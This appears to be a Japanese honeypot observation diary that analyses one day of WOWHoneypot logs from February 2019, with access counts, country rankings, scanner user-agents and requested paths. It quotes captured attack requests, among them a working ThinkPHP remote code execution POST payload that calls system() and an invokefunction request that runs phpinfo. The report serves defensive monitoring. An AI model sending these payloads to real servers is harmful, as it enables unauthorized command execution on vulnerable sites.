ハニーポット観察日記(2019/02/18)
WOWHoneypot
ハニーポット「WOWHoneypot」で2019/02/18 (月) 00:00~23:59 UTC(運用46日目)に取得したログの簡易分析です。
特徴
- 2019/02/15以来、3日ぶりにThinkPHPの探査と脆弱性を利用した攻撃を観測しました。
- 2019/01/10以来、45日ぶりにZmEuによるスキャンを観測しました。
- 9日連続でZGrabによるスキャンを観測しました。
- 2019/02/14以来、4日ぶりにMASSCANによるスキャンを観測しました。
- Viaヘッダが設定されたHTTPリクエストを初めて観測しました。
概況
- 集計期間 : 2019/02/18 (月) 00:00~23:59 UTC
- 総アクセス件数 : 61 件(前日比 +13 件)
- トップページへのアクセス : 42 件
- ZmEuによるスキャン : 6 件
- スキャン開始の合図 : 1 件
- phpMyAdminの探査 : 5 件
- phpMyAdminの探査(ZmEuによるスキャン以外) : 2 件
- robots.txtの探査 : 2 件
- サイトマップの探査 : 2 件
- SSL証明書(ファイル認証方式)の発行の際に生じる一時ファイルの探査 : 2 件
- ファビコンの探査 : 2 件
- ThinkPHPの脆弱性を利用した攻撃(参照) : 2 件
- ThinkPHPの探査 : 1 件
- ユニークIPアドレス件数 : 42 件 (前日比 -5 件)
- アクセス元の国数 : 22 カ国 (前日比 -4 カ国)
国別のアクセス件数
国別のアクセス件数は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | United States | 9 | 6. | 2 | +7 | - |
2. | Taiwan | 6 | 1. | 8 | -2 | - |
3. | China | 6 | 26. | 1 | +5 | - |
4. | Netherlands | 5 | - | 0 | +5 | - |
5. | India | 4 | 20. | 1 | +3 | - |
6. | Vietnam | 4 | 2. | 7 | -3 | - |
7. | Germany | 4 | 19. | 1 | +3 | - |
8. | Italy | 3 | - | 0 | +3 | - |
9. | Ukraine | 3 | - | 0 | +3 | - |
10. | Greece | 2 | - | 0 | +2 | - |
11. | Thailand | 2 | - | 0 | +2 | - |
12. | Bangladesh | 2 | 13. | 1 | +1 | - |
13. | Brazil | 2 | 3. | 5 | -3 | - |
14. | Romania | 1 | 25. | 1 | +-0 | - |
15. | Denmark | 1 | - | 0 | +1 | - |
16. | Spain | 1 | - | 0 | +1 | - |
17. | Russia | 1 | 7. | 2 | -1 | - |
18. | Pakistan | 1 | 8. | 1 | +-0 | - |
19. | Nigeria | 1 | 11. | 1 | +-0 | - |
20. | Czechia | 1 | - | 0 | +1 | - |
21. | South Africa | 1 | - | 0 | +1 | - |
22. | Hungary | 1 | - | 0 | +1 | - |
アクセス先
- 2019/02/15以来、3日ぶりにThinkPHPの探査と脆弱性を利用した攻撃を観測しました。
- 2019/01/10以来、45日ぶりにZmEuによるスキャンを観測しました。
- 件数は6件でした。
- User-Agentは
ZmEu
でした。
- 9日連続でZGrabによるスキャンを観測しました。
- 件数は1件でした。
- User-Agentは
Mozilla/5.0 zgrab/0.x
でした。
- 2019/02/14以来、4日ぶりにMASSCANによるスキャンを観測しました。
- 件数は1件でした。
- User-Agentは
masscan/1.0 (https://github.com/robertdavidgraham/masscan)
でした。
- Viaヘッダが設定されたHTTPリクエストを初めて観測しました。
ThinkPHPの脆弱性を利用した攻撃
今回初めて観測するパスへの攻撃のHTTPリクエストは以下の通りです。
unameコマンドとipconfigコマンドを実行しようとしていました。
POST /TP/public/index.php?s=captcha HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Go-http-client/1.1 Content-Length: 84 Connection: close Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig
- 一部情報を伏せています。
Viaヘッダが設定されたHTTPリクエスト
Viaヘッダが設定されたHTTPリクエストを初めて観測しました。
ホスト名にNetScaler
という文字列が含まれていました。
GET / HTTP/1.0 Host: xxx.xxx.xxx.xxx Via: HTTP/1.0 ホスト名
- 一部情報を伏せています。
アクセス先一覧
アクセス先の一覧は以下の通りです。
順位 | 備考 | アクセス先 | 件数 | 前日の順位 | 前日の件数 | 件数差 |
---|---|---|---|---|---|---|
1. | トップページへのアクセス | GET / HTTP/1.0 | 24 | 1. | 31 | -7 |
2. | トップページへのアクセス | GET / HTTP/1.1 | 18 | 2. | 15 | +3 |
3. | phpMyAdminの探査(ZmEuによるスキャン以外) | GET /mysql/admin/index.php?lang=en HTTP/1.1 | 2 | - | 0 | +2 |
4. | robots.txtの探査 | GET /robots.txt HTTP/1.1 | 2 | - | 0 | +2 |
5. | サイトマップの探査 | GET /sitemap.xml HTTP/1.1 | 2 | - | 0 | +2 |
6. | SSL証明書(ファイル認証方式)の発行の際に生じる一時ファイルの探査 | GET /.well-known/security.txt HTTP/1.1 | 2 | - | 0 | +2 |
7. | ファビコンの探査 | GET /favicon.ico HTTP/1.1 | 2 | - | 0 | +2 |
8. | ZmEuによるスキャン(スキャン開始の合図) | GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1 | 1 | - | 0 | +1 |
9. | phpMyAdminの探査(ZmEuによるスキャン) | GET /phpMyAdmin/scripts/setup.php HTTP/1.1 | 1 | - | 0 | +1 |
10. | phpMyAdminの探査(ZmEuによるスキャン) | GET /phpmyadmin/scripts/setup.php HTTP/1.1 | 1 | - | 0 | +1 |
11. | phpMyAdminの探査(ZmEuによるスキャン) | GET /pma/scripts/setup.php HTTP/1.1 | 1 | - | 0 | +1 |
12. | phpMyAdminの探査(ZmEuによるスキャン) | GET /myadmin/scripts/setup.php HTTP/1.1 | 1 | - | 0 | +1 |
13. | phpMyAdminの探査(ZmEuによるスキャン) | GET /MyAdmin/scripts/setup.php HTTP/1.1 | 1 | - | 0 | +1 |
14. | ThinkPHPの探査 | GET /TP/public/index.php HTTP/1.1 | 1 | - | 0 | +1 |
15. | ThinkPHPの脆弱性を利用した攻撃(参照) | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1 | 1 | - | 0 | +1 |
16. | ThinkPHPの脆弱性を利用した攻撃(参照) | POST /TP/public/index.php?s=captcha HTTP/1.1 | 1 | - | 0 | +1 |
WOWHoneypotで取得したログの簡易分析は以上です。